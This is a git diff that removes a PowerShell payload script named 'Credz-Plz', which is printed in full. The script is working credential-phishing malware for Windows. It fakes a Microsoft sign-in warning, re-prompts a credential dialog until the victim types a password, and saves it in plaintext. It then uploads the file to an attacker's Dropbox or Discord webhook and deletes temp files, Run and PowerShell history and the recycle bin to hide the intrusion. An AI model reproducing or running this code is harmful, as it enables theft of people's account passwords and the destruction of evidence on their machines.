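--- a/Payloads/Flip-Credz-Plz/test.ps1
+++ b/Payloads/Flip-Credz-Plz/test.ps1
@@ -1,220 +0,0 @@
-############################################################################################################################################################
-# | ___ _ _ _ # ,d88b.d88b #
-# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
-# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
-# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
-# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
-# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
-# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
-# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
-# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
-# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
-#__________________________________|_________________________________________________________________________# | | ) ~ ( #
-# tiktok.com/@i_am_jakoby # / \ / ~ \ #
-# github.com/I-Am-Jakoby # \ / \~ ~/ #
-# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
-# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
-# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
-############################################################################################################################################################
- 
-<#
-.SYNOPSIS
- This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
-.DESCRIPTION
- A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
- This will be followed by a fake authentication ui prompt.
- If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
- Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection
-.Link
- https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads
-#>
- 
-#------------------------------------------------------------------------------------------------------------------------------------
-# This is for if you want to host your own version of the script
- 
-# $db = "YOUR-DROPBOX-ACCESS-TOKEN"
- 
-# $dc = "YOUR-DISCORD-WEBHOOK"
- 
-#------------------------------------------------------------------------------------------------------------------------------------
- 
-$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
-
-#------------------------------------------------------------------------------------------------------------------------------------
- 
-<#
-.NOTES
- This is to generate the ui.prompt you will use to harvest their credentials
-#>
- 
-function Get-Creds {
- 
-$form = $null
- 
-while ($form -eq $null)
-{
- $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName);
- $cred.getnetworkcredential().password
- 
- if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password))
- {
- [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
- $form = $null
- }
-
- else{
- $creds = $cred.GetNetworkCredential() | fl
- return $creds
- }
-}
-}
- 
-#----------------------------------------------------------------------------------------------------
- 
-<#
-.NOTES
- This is to pause the script until a mouse movement is detected
-#>
- 
-function Pause-Script{
-Add-Type -AssemblyName System.Windows.Forms
-$originalPOS = [System.Windows.Forms.Cursor]::Position.X
-$o=New-Object -ComObject WScript.Shell
- 
- while (1) {
- $pauseTime = 3
- if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
- break
- }
- else {
- $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
- }
- }
-}
- 
-#----------------------------------------------------------------------------------------------------
- 
-# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
- 
-function Caps-Off {
-Add-Type -AssemblyName System.Windows.Forms
-$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
- 
-#If true, toggle CapsLock key, to ensure that the script doesn't fail
-if ($caps -eq $true){
- 
-$key = New-Object -ComObject WScript.Shell
-$key.SendKeys('{CapsLock}')
-}
-}
-#----------------------------------------------------------------------------------------------------
- 
-<#
-.NOTES
- This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
-#>
- 
-Pause-Script
- 
-Caps-Off
- 
-Add-Type -AssemblyName PresentationCore,PresentationFramework
-$msgBody = "Please authenticate your Microsoft Account."
-$msgTitle = "Authentication Required"
-$msgButton = 'Ok'
-$msgImage = 'Warning'
-$Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage)
-Write-Host "The user clicked: $Result"
- 
-$creds = Get-Creds
- 
-#------------------------------------------------------------------------------------------------------------------------------------
- 
-<#
-.NOTES
- This is to save the gathered credentials to a file in the temp directory
-#>
- 
-echo $creds >> $env:TMP\$FileName
- 
-#------------------------------------------------------------------------------------------------------------------------------------
- 
-<#
-.NOTES
- This is to upload your files to dropbox
-#>
- 
-function DropBox-Upload {
- 
-[CmdletBinding()]
-param (
-
-[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
-[Alias("f")]
-[string]$SourceFilePath
-)
-$outputFile = Split-Path $SourceFilePath -leaf
-$TargetFilePath="/$outputFile"
-$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
-$authorization = "Bearer " + $db
-$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
-$headers.Add("Authorization", $authorization)
-$headers.Add("Dropbox-API-Arg", $arg)
-$headers.Add("Content-Type", 'application/octet-stream')
-Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
-}
- 
-if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName}
- 
-#------------------------------------------------------------------------------------------------------------------------------------
- 
-function Upload-Discord {
- 
-[CmdletBinding()]
-param (
- [parameter(Position=0,Mandatory=$False)]
- [string]$file,
- [parameter(Position=1,Mandatory=$False)]
- [string]$text
-)
- 
-$hookurl = "$dc"
- 
-$Body = @{
- 'username' = $env:username
- 'content' = $text
-}
- 
-if (-not ([string]::IsNullOrEmpty($text))){
-Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
- 
-if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
-}
- 
-if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName}
- 
-#------------------------------------------------------------------------------------------------------------------------------------
- 
-<#
-.NOTES
- This is to clean up behind you and remove any evidence to prove you were there
-#>
- 
-# Delete contents of Temp folder
- 
-rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
- 
-# Delete run box history
- 
-reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
- 
-# Delete powershell history
- 
-Remove-Item (Get-PSreadlineOption).HistorySavePath
- 
-# Deletes contents of recycle bin
- 
-Clear-RecycleBin -Force -ErrorAction SilentlyContinue
- 
-exit
- 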